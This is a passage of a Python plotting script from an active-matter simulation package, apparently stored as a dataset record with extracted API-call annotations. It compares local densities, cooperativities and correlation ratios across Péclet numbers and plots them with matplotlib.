|_________|_____________________________|
VAR_MIN (mandatory) : float separated by ':'
Minimum value of trajectory variable in order of trajectory.
VAR_MAX (mandatory) : float separated by ':'
Maximum value of trajectory variable in order of trajectory.
VAR_C (mandatory) : float separated by ':'
Trajectory variable transition value in order of trajectory.
NOTE: A vertical line is displayed at the corresponding Péclet number.
FIXED_VAR (mandatory) : float separated by ':'
Fixed variable value in order of trajectory.
DENSITIES (mandatory) : float separated by ':'
Packing fractions of particles in order of trajectory.
INITIAL_FRAME_PHILOC : int
Frame to consider as initial in local densities calculations.
DEFAULT: active_particles.plot.pphiloc._init_frame
INTERVAL_MAXIMUM_PHILOC : int
Maximum number of frames on which densities are calculated.
DEFAULT: active_particles.plot.pphiloc._int_max
BOX_SIZE_PHILOC : float
Length of the square boxes in which particles are counted.
DEFAULT: active_particles.plot.pphiloc._box_size
N_CASES_PHILOC : int
Number of boxes in each direction in which local densities are computed.
DEFAULT: active_particles.plot.pphiloc._Ncases
N_BINS : int
Number of bins for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._Nbins
PHIMAX : float
Maximum local density for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._phimax
BOX_SIZE_COR : float
Size of the square box which was considered for correlations.
DEFAULT: simulation box size
X_ZERO : float
Centre of the of the box x-coordinate for correlations.
DEFAULT: 0
Y_ZERO : float
Centre of the of the box y-coordinate for correlations.
DEFAULT: 0
INITIAL_FRAME_COR : int
Frame to consider as initial for correlations.
DEFAULT: active_particles.plot.chi_msd._init_frame_cor
INTERVAL_MAXIMUM_COR : int
Maximum number of intervals of length dt considered for correlations.
DEFAULT: active_particles.plot.chi_msd._int_max_cor
N_CASES_COR : int
Number of boxes in each direction with which the displacement grid is
computed.
DEFAULT: active_particles.plot.chi_msd._Ncases_cor
R_MIN : float
Minimum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_min
R_MAX : float
Maximum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_max
FONT_SIZE : int
Plot font size.
DEFAULT: active_particles.plot.comparison._font_size
MARKER_SIZE : int
Plot marker size.
DEFAULT: active_particles.plot.comparison._marker_size
COLORMAPS : string separated by ':'
Plot colormaps to choose from.
DEFAULT: active_particles.plot.comparison._colormaps
RATIO_LEGEND : float
Width ratio between legend and figure.
DEFAULT: active_particles.plot.comparison._ratio_legend
WSPACE : float
Plots width space.
DEFAULT: active_particles.plot.comparison._wspace
HSPACE : float
Plots height space.
DEFAULT: active_particles.plot.comparison._hspace
X_SCALE : string
Plots x-scale.
DEFAULT: active_particles.plot.comparison._x_scale
PHILOC_YS : string
Most probable local density y-scale.
DEFAULT: active_particles.plot.comparison._philoc_ys
CHI_YS : string
Maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._chi_ys
DT_YS : string
Time of maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._dt_ys
RATIOTL_YS : string
Ratio of transversal and longitudinal correlations y-scale.
DEFAULT: active_particles.plot.comparison._ratioTL_ys
Output
------
> Saves figure to IMAGE_NAME.
[SHOW mode]
> Displays plot.
"""
import active_particles.naming as naming
from active_particles.init import get_env, get_env_list
from os import environ as envvar
if __name__ == '__main__': envvar['SHOW'] = 'True'
from os.path import join as joinpath
from active_particles.plot.plot import list_colormap, list_markers,\
list_linestyles
from active_particles.plot.pphiloc import Philoc,\
_init_frame as _init_frame_philoc, _int_max as _int_max_philoc,\
_box_size as _box_size_philoc, _Ncases as _Ncases_philoc,\
_Nbins, _phimax
from active_particles.plot.chi_msd import ChiMsd,\
_init_frame_cor, _int_max_cor, _Ncases_cor, _r_min, _r_max
from active_particles.plot.corlcort import CLCT
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
from matplotlib.lines import Line2D
# DEFAULT VARIABLES
_N = int(1e5) # default number of particles
_font_size = 25 # default plot font size
_marker_size = 20 # default plot marker size
_colormaps = ('cool', 'hot') # default plot colormaps
_wspace = 0.4 # default plot width space
_hspace = 0.05 # default plot height space
_ratio_legend = 2 # default width ratio between graphs and legends
_x_scale = 'log' # default plots x-scale
_philoc_ys = 'linear' # default most probable local density y-scale
_chi_ys = 'log' # default maximum cooperativity y-scale
_dt_ys = 'log' # default time of maximum cooperativity y-scale
_ratioTL_ys = 'linear' # default ratio of transversal and longitudinal correlations y-scale
_image_name = joinpath(get_env('HOME'), 'comparison.eps') # default image file name
# SCRIPT
if __name__ == '__main__': # executing as script
# VARIABLES DEFINITIONS
var = get_env_list('VARIABLES') # plot variables
var_min = get_env_list('VAR_MIN', vartype=float) # minimum values of plot variable
var_max = get_env_list('VAR_MAX', vartype=float) # maximum values of plot variable
var_c = get_env_list('VAR_C', vartype=float) # plot variable transition value
fixed_var = get_env_list('FIXED_VAR', vartype=float) # values of fixed variables
densities = get_env_list('DENSITIES', vartype=float) # packing fractions of particles
if not(len(var) == len(var_min) == len(var_max) == len(fixed_var)
== len(var_c) == len(densities)):
raise IndexError(
'VARIABLES, VAR_MIN, VAR_MAX, VAR_C, FIXED_VAR and DENSITIES \
must have equal lengths.')
comparisons = len(var) # number of trajectories to compare
var_label = [] # variables labels
fix_label = [] # fixed variable labels
var_attribute = [] # variables attribute to be displayed in file names
pe_func = [] # Péclet number as function of plot variable
for index in range(comparisons):
if var[index] == 'dr':
var_label += ['\\tilde{\\nu}_r']
fix_label += ['\\tilde{v}']
var_attribute += [{'vzero': fixed_var[index]}]
pe_func += [(lambda index: lambda x: fixed_var[index]/x)(index)]
elif var[index] == 'vzero':
var_label += ['\\tilde{v}']
fix_label += ['\\tilde{\\nu}_r']
var_attribute += [{'dr': fixed_var[index]}]
pe_func += [(lambda index: lambda x: x/fixed_var[index])(index)]
else: raise ValueError('Variable %s is not known.' % var[index])
cor = get_env('CORRELATION', default='Cuu') # correlation variable
if cor == 'Cuu': # cooperativities from
naming_cor = naming.Cuu() # correlations naming object
cor_name = 'C_{uu}' # correlations name
elif cor == 'Cww':
naming_cor = naming.Cww() # correlations naming object
cor_name = 'C_{\\delta u \\delta u}' # correlations name
elif cor == 'Cdd':
naming_cor = naming.Cdd() # correlations naming object
cor_name = 'C_{|u||u|}' # correlations name
elif cor == 'Cee':
naming_cor = naming.Cee() # correlations naming object
cor_name = 'C_{\\hat{u}\\hat{u}}' # correlations name
else: raise ValueError('Correlation %s is not known.' % cor) # correlation is not known
data_dir = get_env('DATA_DIRECTORY', default=naming.sim_directory) # data directory
excluded_directories = get_env('EXCLUDE', default='') # directories to exclude
parameters_file = get_env('PARAMETERS_FILE',
default=naming.parameters_file) # simulations parameters file name
N = get_env('N', default=_N, vartype=int) # number of particles
init_frame_philoc = get_env('INITIAL_FRAME_PHILOC',
default=_init_frame_philoc, vartype=int) # frame to consider as initial in local densities calculations
int_max_philoc = get_env('INTERVAL_MAXIMUM_PHILOC',
default=_int_max_philoc, vartype=int) # maximum number of frames on which densities are calculated
box_size_philoc = get_env('BOX_SIZE_PHILOC',
default=_box_size_philoc, vartype=float) # length of the square boxes in which particles are counted
Ncases_philoc = get_env('N_CASES_PHILOC',
default=_Ncases_philoc, vartype=int) # number of boxes in each direction in which local densities are computed
Nbins = get_env('N_BINS', default=_Nbins, vartype=int) # number of bins for the local densities histogram
phimax = get_env('PHIMAX', default=_phimax, vartype=float) # maximum local density for the local densities histogram
box_size_cor = get_env('BOX_SIZE_COR', vartype=float) # size of the square box which was considered for correlations
centre_cor = (get_env('X_ZERO', default=0, vartype=float),
get_env('Y_ZERO', default=0, vartype=float)) # centre of the box for correlations
init_frame_cor = get_env('INITIAL_FRAME_COR',
default=_init_frame_cor, vartype=int) # frame to consider as initial for correlations
int_max_cor = get_env('INTERVAL_MAXIMUM_COR',
default=_int_max_cor, vartype=int) # maximum number of intervals of length dt considered for correlations
Ncases_cor = get_env('N_CASES_COR', default=_Ncases_cor, vartype=int) # number of boxes in each direction with which the displacement grid is computed
r_min = get_env('R_MIN', default=_r_min, vartype=float) # minimum radius for correlations integration
r_max = get_env('R_MAX', default=_r_max, vartype=float) # maximum radius for correlations integration
# NAMING
attributes_philoc = {'N': N, 'init_frame': init_frame_philoc,
'int_max': int_max_philoc, 'Ncases': Ncases_philoc,
'box_size': box_size_philoc} # attributes displayed in local densities file names
attributes_cor = {'N': N, 'init_frame': init_frame_cor,
'int_max': int_max_cor, 'Ncases': Ncases_cor, 'box_size': box_size_cor,
'x_zero': centre_cor[0], 'y_zero': centre_cor[1]} # attributes displayed in correlations file names
naming_varN = naming.VarN() # varN naming object
naming_simdir = naming.AHB2D() # simulation directory naming object
# PLOT PARAMETERS
font_size = get_env('FONT_SIZE', default=_font_size, vartype=float) # plot font size
marker_size = get_env('MARKER_SIZE', default=_marker_size, vartype=int) # plot marker size
mpl.rcParams.update({'font.size': font_size,
'lines.markersize': marker_size})
colormaps = get_env_list('COLORMAPS') # plot colormaps
if colormaps == []: colormaps = _colormaps # no plot colormaps provided, use default
while len(colormaps) < comparisons: colormaps += colormaps # at least as much colormaps as trajectories to compare
ratio_legend = get_env('RATIO_LEGEND',
default=_ratio_legend, vartype=float) # width ratio between graphs and legends
wspace = get_env('WSPACE', default=_wspace, vartype=float) # plots width space
hspace = get_env('HSPACE', default=_hspace, vartype=float) # plots height space
x_scale = get_env('X_SCALE', default=_x_scale) # plots x-scale
philoc_ys = get_env('PHILOC_YS', default=_philoc_ys) # most probable local density y-scale
chi_ys = get_env('CHI_YS', default=_chi_ys) # maximum cooperativity y-scale
dt_ys = get_env('DT_YS', default=_dt_ys) # time of maximum cooperativity y-scale
ratioTL_ys = get_env('RATIOTL_YS', default=_ratioTL_ys) # ratio of transversal and longitudinal correlations y-scale
multiply_with_dr = get_env('DRDT', default=True, vartype=bool) # plot dr*dt rather than dt
if multiply_with_dr:
dt_label = r'$\tilde{\nu}_r \Delta t^*$' # dt label
else: dt_label = r'$\Delta t^*$' # dt label
# CALCULATION
philoc = [] # local densities histogram calculators
chimsd = [] # cooperativities calculators
clct = [] # longtidunal and transversal correlations calculators
for v, vmin, vmax, phi, vattribute\
in zip(var, var_min, var_max, densities, var_attribute):
philoc += [Philoc(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_philoc},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
philoc[-1].calculate(naming_varN,
{'density': phi, **vattribute, **attributes_philoc}, Nbins, phimax)
chimsd += [ChiMsd(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_cor},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
chimsd[-1].calculate(naming_cor,
{'density': phi, **vattribute, **attributes_cor}, r_min, r_max,
box_size=box_size_cor, multiply_with_dr=multiply_with_dr)
clct += [CLCT(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_cor},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
clct[-1].calculate(naming_cor,
{'density': phi, **vattribute, **attributes_cor},
multiply_with_dr=multiply_with_dr)
clct[-1].calculate_max(chimsd[-1].dtmax)
# PLOT
colors = list(map(
lambda philoc_traj, chimsd_traj, clct_traj, cmap:
list_colormap(
sorted(philoc_traj.var_list + chimsd_traj.var_list +
clct_traj.var_list),
colormap=cmap),
*(philoc, chimsd, clct, colormaps))) # plot colors hash tables
markers = list(map(
lambda philoc_traj, chimsd_traj, clct_traj:
list_markers(
sorted(philoc_traj.time_step_list + chimsd_traj.time_step_list
+ clct_traj.time_step_list)),
*(philoc, chimsd, clct))) # plot markers hash tables
linestyles = list_linestyles(range(comparisons)) # Péclet transition values vertical lines
fig = plt.figure()
fig.set_size_inches(30, 30)
fig.subplots_adjust(wspace=wspace)
fig.subplots_adjust(hspace=hspace)
fig.suptitle(
r'$N=%.2e$' % N + '\n' + r'$[%s]:$' % cor_name
+ r'$S_{init}=%.2e, S_{max}=%.2e,$' % (init_frame_cor, int_max_cor)
+ r'$N_{cases}=%.2e, r_{min}=%.2e,$' % (Ncases_cor, r_min)
+ r'$r_{max}=%.2e$' % r_max + '\n'
+ r'$[\phi^*_{loc}]: S_{init}=%.2e,$' % init_frame_philoc
+ r'$S_{max}=%.2e, N_{cases}=%.2e,$' % (int_max_philoc, Ncases_philoc)
+ r'$r_{max}=%.2e$' % box_size_philoc)
gs = GridSpec(4, 1 + comparisons,
width_ratios=[1] + comparisons*[1/(comparisons*ratio_legend)])
ax_philoc = plt.subplot(gs[0, 0])
ax_philoc.set_xscale(x_scale)
ax_philoc.set_yscale(philoc_ys)
ax_philoc.set_ylabel(r'$\phi^*_{loc}$')
ax_chi = plt.subplot(gs[1, 0])
ax_chi.set_xscale(x_scale)
ax_chi.set_yscale(chi_ys)
ax_chi.set_ylabel(r'$\chi(\Delta t^*) = \frac{1}{L^2}$'
+ r'$\int_{r=r_{min}}^{r=r_{max}} dr 2 \pi r %s(r, \Delta t^*)$'
% cor_name)
ax_dt = plt.subplot(gs[2, 0])
ax_dt.set_xscale(x_scale)
ax_dt.set_yscale(dt_ys)
ax_dt.set_ylabel(dt_label)
ax_ratioTL = plt.subplot(gs[3, 0])
ax_ratioTL.set_xscale(x_scale)
ax_ratioTL.set_xlabel(r'$Pe$')
ax_ratioTL.set_yscale(ratioTL_ys)
ax_ratioTL.set_ylabel(r'$%s^T/%s^L(\Delta t^*)$' % (cor_name, cor_name))
plt.setp(
[ax.get_xticklabels() for ax in [ax_philoc, ax_chi, ax_dt]],
visible=False)
axes_legend = [plt.subplot(gs[:, 1 + traj]) for traj in range(comparisons)]
for (phi, f_label, f_var, c_label, c_var, x_func, philoc_traj, chimsd_traj,
clct_traj, colors_traj, markers_traj, linestyle, ax_legend)\
in zip(densities, fix_label, fixed_var, var_label, var_c, pe_func,
philoc, chimsd, clct, colors, markers, linestyles.values(),
axes_legend):
x_func_var_c = x_func(c_var)
ax_philoc.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in philoc_traj.philocmax:
var_value = philoc_traj.var_hash[dir]
ax_philoc.scatter(
x_func(var_value), philoc_traj.philocmax[dir],
color=colors_traj[var_value],
marker=markers_traj[philoc_traj.time_step[dir]])
ax_chi.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in chimsd_traj.chimax:
if not(chimsd_traj.isinvarinterval[dir]): continue
var_value = chimsd_traj.var_hash[dir]
ax_chi.scatter(
x_func(var_value), chimsd_traj.chimax[dir],
color=colors_traj[var_value],
marker=markers_traj[chimsd_traj.time_step[dir]])
ax_dt.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in chimsd_traj.dtmax:
if not(chimsd_traj.isinvarinterval[dir]): continue
var_value = chimsd_traj.var_hash[dir]
ax_dt.scatter(
x_func(var_value), chimsd_traj.dtmax[dir],
color=colors_traj[var_value],
marker=markers_traj[chimsd_traj.time_step[dir]])
ax_ratioTL.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in clct_traj.ratioTL_max:
var_value = clct_traj.var_hash[dir]
ax_ratioTL.scatter(
x_func(var_value), clct_traj.ratioTL_max[dir],
color=colors_traj[var_value],
marker=markers_traj[clct_traj.time_step[dir]])
legend = [
Line2D([0], [0], lw=0,
label=r'$\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var)),
Line2D([0], [0], lw=0),
Line2D([0], [0], linestyle=linestyle, color='black',
label=r'$%s = %.1e$' % (c_label, c_var)),
Line2D([0], [0], lw=0)]
legend += list(map(
lambda var_value: Line2D([0], [0],
color=colors_traj[var_value],
label=r'$%s = %.1e$' % (c_label, var_value)),
colors_traj))
legend += [Line2D([0], [0], lw=0)]
legend += list(map(
lambda time_step: Line2D([0], [0], lw=0, color='black',
marker=markers_traj[time_step],
label=r'$dt = %.1e$' % time_step),
markers_traj))
ax_legend.axis('off')
ax_legend.legend(handles=legend, loc='center')
# SAVING
fig.savefig(get_env('IMAGE_NAME', default=_image_name))
# SHOW
if get_env('SHOW', default=True, vartype=bool): plt.show()
| [
"active_particles.naming.AHB2D",
"active_particles.naming.Cee",
"matplotlib.rcParams.update",
"matplotlib.pyplot.show",
"active_particles.naming.Cww",
"active_particles.plot.pphiloc.Philoc",
"active_particles.plot.chi_msd.ChiMsd",
"matplotlib.lines.Line2D",
"active_particles.init.get_env",
"active... | [((8387, 8402), 'active_particles.init.get_env', 'get_env', (['"""HOME"""'], {}), "('HOME')\n", (8394, 8402), False, 'from active_particles.init import get_env, get_env_list\n'), ((8551, 8576), 'active_particles.init.get_env_list', 'get_env_list', (['"""VARIABLES"""'], {}), "('VARIABLES')\n", (8563, 8576), False, 'from active_particles.init import get_env, get_env_list\n'), ((8632, 8670), 'active_particles.init.get_env_list', 'get_env_list', (['"""VAR_MIN"""'], {'vartype': 'float'}), "('VAR_MIN', vartype=float)\n", (8644, 8670), False, 'from active_particles.init import get_env, get_env_list\n'), ((8726, 8764), 'active_particles.init.get_env_list', 'get_env_list', (['"""VAR_MAX"""'], {'vartype': 'float'}), "('VAR_MAX', vartype=float)\n", (8738, 8764), False, 'from active_particles.init import get_env, get_env_list\n'), ((8818, 8854), 'active_particles.init.get_env_list', 'get_env_list', (['"""VAR_C"""'], {'vartype': 'float'}), "('VAR_C', vartype=float)\n", (8830, 8854), False, 'from active_particles.init import get_env, get_env_list\n'), ((8915, 8955), 'active_particles.init.get_env_list', 'get_env_list', (['"""FIXED_VAR"""'], {'vartype': 'float'}), "('FIXED_VAR', vartype=float)\n", (8927, 8955), False, 'from active_particles.init import get_env, get_env_list\n'), ((9003, 9043), 'active_particles.init.get_env_list', 'get_env_list', (['"""DENSITIES"""'], {'vartype': 'float'}), "('DENSITIES', vartype=float)\n", (9015, 9043), False, 'from active_particles.init import get_env, get_env_list\n'), ((10295, 10332), 'active_particles.init.get_env', 'get_env', (['"""CORRELATION"""'], {'default': '"""Cuu"""'}), "('CORRELATION', default='Cuu')\n", (10302, 10332), False, 'from active_particles.init import get_env, get_env_list\n'), ((11116, 11171), 'active_particles.init.get_env', 'get_env', (['"""DATA_DIRECTORY"""'], {'default': 'naming.sim_directory'}), "('DATA_DIRECTORY', default=naming.sim_directory)\n", (11123, 11171), False, 'from active_particles.init import get_env, get_env_list\n'), ((11217, 11247), 'active_particles.init.get_env', 'get_env', (['"""EXCLUDE"""'], {'default': '""""""'}), "('EXCLUDE', default='')\n", (11224, 11247), False, 'from active_particles.init import get_env, get_env_list\n'), ((11310, 11368), 'active_particles.init.get_env', 'get_env', (['"""PARAMETERS_FILE"""'], {'default': 'naming.parameters_file'}), "('PARAMETERS_FILE', default=naming.parameters_file)\n", (11317, 11368), False, 'from active_particles.init import get_env, get_env_list\n'), ((11421, 11458), 'active_particles.init.get_env', 'get_env', (['"""N"""'], {'default': '_N', 'vartype': 'int'}), "('N', default=_N, vartype=int)\n", (11428, 11458), False, 'from active_particles.init import get_env, get_env_list\n'), ((11528, 11600), 'active_particles.init.get_env', 'get_env', (['"""INITIAL_FRAME_PHILOC"""'], {'default': '_init_frame_philoc', 'vartype': 'int'}), "('INITIAL_FRAME_PHILOC', default=_init_frame_philoc, vartype=int)\n", (11535, 11600), False, 'from active_particles.init import get_env, get_env_list\n'), ((11696, 11768), 'active_particles.init.get_env', 'get_env', (['"""INTERVAL_MAXIMUM_PHILOC"""'], {'default': '_int_max_philoc', 'vartype': 'int'}), "('INTERVAL_MAXIMUM_PHILOC', default=_int_max_philoc, vartype=int)\n", (11703, 11768), False, 'from active_particles.init import get_env, get_env_list\n'), ((11867, 11934), 'active_particles.init.get_env', 'get_env', (['"""BOX_SIZE_PHILOC"""'], {'default': '_box_size_philoc', 'vartype': 'float'}), "('BOX_SIZE_PHILOC', default=_box_size_philoc, vartype=float)\n", (11874, 11934), False, 'from active_particles.init import get_env, get_env_list\n'), ((12027, 12089), 'active_particles.init.get_env', 'get_env', (['"""N_CASES_PHILOC"""'], {'default': '_Ncases_philoc', 'vartype': 'int'}), "('N_CASES_PHILOC', default=_Ncases_philoc, vartype=int)\n", (12034, 12089), False, 'from active_particles.init import get_env, get_env_list\n'), ((12188, 12234), 'active_particles.init.get_env', 'get_env', (['"""N_BINS"""'], {'default': '_Nbins', 'vartype': 'int'}), "('N_BINS', default=_Nbins, vartype=int)\n", (12195, 12234), False, 'from active_particles.init import get_env, get_env_list\n'), ((12304, 12353), 'active_particles.init.get_env', 'get_env', (['"""PHIMAX"""'], {'default': '_phimax', 'vartype': 'float'}), "('PHIMAX', default=_phimax, vartype=float)\n", (12311, 12353), False, 'from active_particles.init import get_env, get_env_list\n'), ((12433, 12471), 'active_particles.init.get_env', 'get_env', (['"""BOX_SIZE_COR"""'], {'vartype': 'float'}), "('BOX_SIZE_COR', vartype=float)\n", (12440, 12471), False, 'from active_particles.init import get_env, get_env_list\n'), ((12716, 12782), 'active_particles.init.get_env', 'get_env', (['"""INITIAL_FRAME_COR"""'], {'default': '_init_frame_cor', 'vartype': 'int'}), "('INITIAL_FRAME_COR', default=_init_frame_cor, vartype=int)\n", (12723, 12782), False, 'from active_particles.init import get_env, get_env_list\n'), ((12887, 12953), 'active_particles.init.get_env', 'get_env', (['"""INTERVAL_MAXIMUM_COR"""'], {'default': '_int_max_cor', 'vartype': 'int'}), "('INTERVAL_MAXIMUM_COR', default=_int_max_cor, vartype=int)\n", (12894, 12953), False, 'from active_particles.init import get_env, get_env_list\n'), ((13083, 13139), 'active_particles.init.get_env', 'get_env', (['"""N_CASES_COR"""'], {'default': '_Ncases_cor', 'vartype': 'int'}), "('N_CASES_COR', default=_Ncases_cor, vartype=int)\n", (13090, 13139), False, 'from active_particles.init import get_env, get_env_list\n'), ((13236, 13283), 'active_particles.init.get_env', 'get_env', (['"""R_MIN"""'], {'default': '_r_min', 'vartype': 'float'}), "('R_MIN', default=_r_min, vartype=float)\n", (13243, 13283), False, 'from active_particles.init import get_env, get_env_list\n'), ((13342, 13389), 'active_particles.init.get_env', 'get_env', (['"""R_MAX"""'], {'default': '_r_max', 'vartype': 'float'}), "('R_MAX', default=_r_max, vartype=float)\n", (13349, 13389), False, 'from active_particles.init import get_env, get_env_list\n'), ((13958, 13971), 'active_particles.naming.VarN', 'naming.VarN', ([], {}), '()\n', (13969, 13971), True, 'import active_particles.naming as naming\n'), ((14033, 14047), 'active_particles.naming.AHB2D', 'naming.AHB2D', ([], {}), '()\n', (14045, 14047), True, 'import active_particles.naming as naming\n'), ((14142, 14197), 'active_particles.init.get_env', 'get_env', (['"""FONT_SIZE"""'], {'default': '_font_size', 'vartype': 'float'}), "('FONT_SIZE', default=_font_size, vartype=float)\n", (14149, 14197), False, 'from active_particles.init import get_env, get_env_list\n'), ((14237, 14294), 'active_particles.init.get_env', 'get_env', (['"""MARKER_SIZE"""'], {'default': '_marker_size', 'vartype': 'int'}), "('MARKER_SIZE', default=_marker_size, vartype=int)\n", (14244, 14294), False, 'from active_particles.init import get_env, get_env_list\n'), ((14318, 14396), 'matplotlib.rcParams.update', 'mpl.rcParams.update', (["{'font.size': font_size, 'lines.markersize': marker_size}"], {}), "({'font.size': font_size, 'lines.markersize': marker_size})\n", (14337, 14396), True, 'import matplotlib as mpl\n'), ((14422, 14447), 'active_particles.init.get_env_list', 'get_env_list', (['"""COLORMAPS"""'], {}), "('COLORMAPS')\n", (14434, 14447), False, 'from active_particles.init import get_env, get_env_list\n'), ((14733, 14794), 'active_particles.init.get_env', 'get_env', (['"""RATIO_LEGEND"""'], {'default': '_ratio_legend', 'vartype': 'float'}), "('RATIO_LEGEND', default=_ratio_legend, vartype=float)\n", (14740, 14794), False, 'from active_particles.init import get_env, get_env_list\n'), ((14860, 14909), 'active_particles.init.get_env', 'get_env', (['"""WSPACE"""'], {'default': '_wspace', 'vartype': 'float'}), "('WSPACE', default=_wspace, vartype=float)\n", (14867, 14909), False, 'from active_particles.init import get_env, get_env_list\n'), ((14944, 14993), 'active_particles.init.get_env', 'get_env', (['"""HSPACE"""'], {'default': '_hspace', 'vartype': 'float'}), "('HSPACE', default=_hspace, vartype=float)\n", (14951, 14993), False, 'from active_particles.init import get_env, get_env_list\n'), ((15031, 15067), 'active_particles.init.get_env', 'get_env', (['"""X_SCALE"""'], {'default': '_x_scale'}), "('X_SCALE', default=_x_scale)\n", (15038, 15067), False, 'from active_particles.init import get_env, get_env_list\n'), ((15109, 15149), 'active_particles.init.get_env', 'get_env', (['"""PHILOC_YS"""'], {'default': '_philoc_ys'}), "('PHILOC_YS', default=_philoc_ys)\n", (15116, 15149), False, 'from active_particles.init import get_env, get_env_list\n'), ((15204, 15238), 'active_particles.init.get_env', 'get_env', (['"""CHI_YS"""'], {'default': '_chi_ys'}), "('CHI_YS', default=_chi_ys)\n", (15211, 15238), False, 'from active_particles.init import get_env, get_env_list\n'), ((15295, 15327), 'active_particles.init.get_env', 'get_env', (['"""DT_YS"""'], {'default': '_dt_ys'}), "('DT_YS', default=_dt_ys)\n", (15302, 15327), False, 'from active_particles.init import get_env, get_env_list\n'), ((15400, 15442), 'active_particles.init.get_env', 'get_env', (['"""RATIOTL_YS"""'], {'default': '_ratioTL_ys'}), "('RATIOTL_YS', default=_ratioTL_ys)\n", (15407, 15442), False, 'from active_particles.init import get_env, get_env_list\n'), ((15528, 15571), 'active_particles.init.get_env', 'get_env', (['"""DRDT"""'], {'default': '(True)', 'vartype': 'bool'}), "('DRDT', default=True, vartype=bool)\n", (15535, 15571), False, 'from active_particles.init import get_env, get_env_list\n'), ((17882, 17894), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (17892, 17894), True, 'import matplotlib.pyplot as plt\n'), ((18466, 18568), 'matplotlib.gridspec.GridSpec', 'GridSpec', (['(4)', '(1 + comparisons)'], {'width_ratios': '([1] + comparisons * [1 / (comparisons * ratio_legend)])'}), '(4, 1 + comparisons, width_ratios=[1] + comparisons * [1 / (\n comparisons * ratio_legend)])\n', (18474, 18568), False, 'from matplotlib.gridspec import GridSpec\n'), ((18583, 18604), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[0, 0]'], {}), '(gs[0, 0])\n', (18594, 18604), True, 'import matplotlib.pyplot as plt\n'), ((18733, 18754), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[1, 0]'], {}), '(gs[1, 0])\n', (18744, 18754), True, 'import matplotlib.pyplot as plt\n'), ((18982, 19003), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[2, 0]'], {}), '(gs[2, 0])\n', (18993, 19003), True, 'import matplotlib.pyplot as plt\n'), ((19111, 19132), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[3, 0]'], {}), '(gs[3, 0])\n', (19122, 19132), True, 'import matplotlib.pyplot as plt\n'), ((22428, 22471), 'active_particles.init.get_env', 'get_env', (['"""SHOW"""'], {'default': '(True)', 'vartype': 'bool'}), "('SHOW', default=True, vartype=bool)\n", (22435, 22471), False, 'from active_particles.init import get_env, get_env_list\n'), ((10426, 10438), 'active_particles.naming.Cuu', 'naming.Cuu', ([], {}), '()\n', (10436, 10438), True, 'import active_particles.naming as naming\n'), ((12555, 12598), 'active_particles.init.get_env', 'get_env', (['"""X_ZERO"""'], {'default': '(0)', 'vartype': 'float'}), "('X_ZERO', default=0, vartype=float)\n", (12562, 12598), False, 'from active_particles.init import get_env, get_env_list\n'), ((12604, 12647), 'active_particles.init.get_env', 'get_env', (['"""Y_ZERO"""'], {'default': '(0)', 'vartype': 'float'}), "('Y_ZERO', default=0, vartype=float)\n", (12611, 12647), False, 'from active_particles.init import get_env, get_env_list\n'), ((19445, 19473), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs[:, 1 + traj]'], {}), '(gs[:, 1 + traj])\n', (19456, 19473), True, 'import matplotlib.pyplot as plt\n'), ((22364, 22406), 'active_particles.init.get_env', 'get_env', (['"""IMAGE_NAME"""'], {'default': '_image_name'}), "('IMAGE_NAME', default=_image_name)\n", (22371, 22406), False, 'from active_particles.init import get_env, get_env_list\n'), ((22473, 22483), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (22481, 22483), True, 'import matplotlib.pyplot as plt\n'), ((10572, 10584), 'active_particles.naming.Cww', 'naming.Cww', ([], {}), '()\n', (10582, 10584), True, 'import active_particles.naming as naming\n'), ((16070, 16231), 'active_particles.plot.pphiloc.Philoc', 'Philoc', (['data_dir', 'naming_simdir', "{'density': phi, **vattribute, **attributes_philoc}", 'parameters_file', 'v', 'vmin', 'vmax'], {'excluded_dir': 'excluded_directories'}), "(data_dir, naming_simdir, {'density': phi, **vattribute, **\n attributes_philoc}, parameters_file, v, vmin, vmax, excluded_dir=\n excluded_directories)\n", (16076, 16231), False, 'from active_particles.plot.pphiloc import Philoc, _init_frame as _init_frame_philoc, _int_max as _int_max_philoc, _box_size as _box_size_philoc, _Ncases as _Ncases_philoc, _Nbins, _phimax\n'), ((16389, 16547), 'active_particles.plot.chi_msd.ChiMsd', 'ChiMsd', (['data_dir', 'naming_simdir', "{'density': phi, **vattribute, **attributes_cor}", 'parameters_file', 'v', 'vmin', 'vmax'], {'excluded_dir': 'excluded_directories'}), "(data_dir, naming_simdir, {'density': phi, **vattribute, **\n attributes_cor}, parameters_file, v, vmin, vmax, excluded_dir=\n excluded_directories)\n", (16395, 16547), False, 'from active_particles.plot.chi_msd import ChiMsd, _init_frame_cor, _int_max_cor, _Ncases_cor, _r_min, _r_max\n'), ((16768, 16924), 'active_particles.plot.corlcort.CLCT', 'CLCT', (['data_dir', 'naming_simdir', "{'density': phi, **vattribute, **attributes_cor}", 'parameters_file', 'v', 'vmin', 'vmax'], {'excluded_dir': 'excluded_directories'}), "(data_dir, naming_simdir, {'density': phi, **vattribute, **\n attributes_cor}, parameters_file, v, vmin, vmax, excluded_dir=\n excluded_directories)\n", (16772, 16924), False, 'from active_particles.plot.corlcort import CLCT\n'), ((21483, 21561), 'matplotlib.lines.Line2D', 'Line2D', (['[0]', '[0]'], {'lw': 